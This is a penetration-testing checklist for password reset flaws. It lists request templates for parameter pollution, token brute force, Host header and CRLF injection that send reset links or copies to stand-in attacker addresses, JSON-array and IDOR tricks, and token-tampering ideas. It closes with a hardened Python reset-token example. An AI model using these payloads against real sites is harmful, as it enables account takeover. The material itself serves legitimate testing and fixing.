
Password Reset Functionality

Concept

In this vulnerability class the attacker targets the password reset functionality of the application; if the attacker succeeds, this can lead to full account takeover. Below are some ways to exploit it.

Ways to bypass

Include your email as a second parameter

POST  /reset

[....]

email=victim@xyz.com&email=attacker@abc.com

Brute force the password reset token

POST  /reset

[....]

email=victim@xyz.com&token={bruteforce}

Try using your own reset token against the victim's account

POST  /reset

[....]

email=victim@xyz.com&token={yourtoken}

Host header injection

  • Try changing the Host header; if the reset link is built from it, the token may be sent to the attacker's server
POST  /reset

Host: Attacker.com

Try to figure out how the tokens are generated

For example:

They might be generated based on timestamp.

They might be generated based on the user id.

They might be generated based on the email id.

CRLF Injection

POST  /reset

[....]

email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
CRLF:

POST /resetPassword?%0a%0dHost:attacker.tld (also try the X-Host, True-Client-IP and X-Forwarded-* headers)

Business logic

While inviting users into your account/organization, you can also try inviting company emails and adding a new field, "password": "example123" or "pass": "example123", to the request. You may end up resetting a user's password.

(Company emails can be found via hunter.io.)

JSON array

POST  /reset

[....]

{"email":["victim@mail.tld","attacker@mail.tld"]}

Token leakage via Referer header

POST  /reset

[....]

Referer:https://xyz.com/token={token}

IDOR for password reset

  • Try changing the id parameter
POST  /reset

[....]

id=1234&

Some other ways

  1. Race condition: Exploit timing dependencies to manipulate password reset processes.

  2. Completely remove the token: Attempt reset without providing a valid token.

  3. Change token to all zeroes: Try resetting with a token composed entirely of zeroes.

  4. Use null/nil value: Provide null or nil instead of a valid token.

  5. Try expired token: Attempt to use a token that has already expired.

  6. Reuse old password reset token: Use a previously used token for reset.

  7. Try an array of old tokens: Attempt reset with multiple old tokens simultaneously.

  8. Modify token slightly: Alter token characters to check for validation weaknesses.

  9. Use Unicode to spoof email: Exploit Unicode characters to manipulate email addresses.

  10. Manipulate email format: Attempt to include multiple addresses or special characters in the email field.

  11. Change request method/content type: Modify HTTP request methods or content types during the reset process.

  12. Manipulate server response: Intercept and alter server responses during reset attempts.

  13. Use super long input: Provide excessively long inputs to exploit validation or buffer overflow vulnerabilities.
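For reference when triaging or fixing findings from this checklist, the following is an added example (not from the original page) of a reset-token handler hardened against the weaknesses above: a CSPRNG token that is not derived from timestamps, user ids or emails; only the token hash stored server side; expiry, single use and binding to one email; constant-time comparison; the link built from a configured base URL rather than the Host header; and duplicated `email` parameters rejected. The class and function names are hypothetical and the inputs are constructed.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs


class PasswordResetService:
    """Hypothetical hardened reset flow: stores only token hashes; tokens expire and are single-use."""

    def __init__(self, base_url, ttl_seconds=900, clock=time.time):
        self.base_url = base_url      # fixed configuration, never taken from the Host header
        self.ttl = ttl_seconds
        self.clock = clock            # injectable for testing expiry
        self._tokens = {}             # sha256(token) -> (email, expires_at)

    @staticmethod
    def _hash(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, email):
        # 256 bits from the OS CSPRNG: not brute-forceable, not derived from time, id or email
        token = secrets.token_urlsafe(32)
        self._tokens[self._hash(token)] = (email, self.clock() + self.ttl)
        return f"{self.base_url}/reset?token={token}"

    def consume(self, email, token):
        """True only if token is a real, unexpired, unused token bound to this email. Always invalidates it."""
        if not isinstance(token, str) or not token:   # rejects missing, null and array tokens
            return False
        h = self._hash(token)
        match = None
        for stored in list(self._tokens):             # compare against every stored hash in constant time
            if hmac.compare_digest(stored, h):
                match = stored
        if match is None:                             # covers all-zero, modified and old tokens
            return False
        bound_email, expires_at = self._tokens.pop(match)   # single use, even if the checks below fail
        if self.clock() > expires_at:
            return False
        return hmac.compare_digest(bound_email.encode(), str(email).encode())


def single_email(form_body):
    """Parse a form body and accept exactly one email value (rejects email=victim&email=attacker)."""
    values = parse_qs(form_body, keep_blank_values=True).get("email", [])
    if len(values) != 1 or not isinstance(values[0], str):
        return None
    return values[0]
```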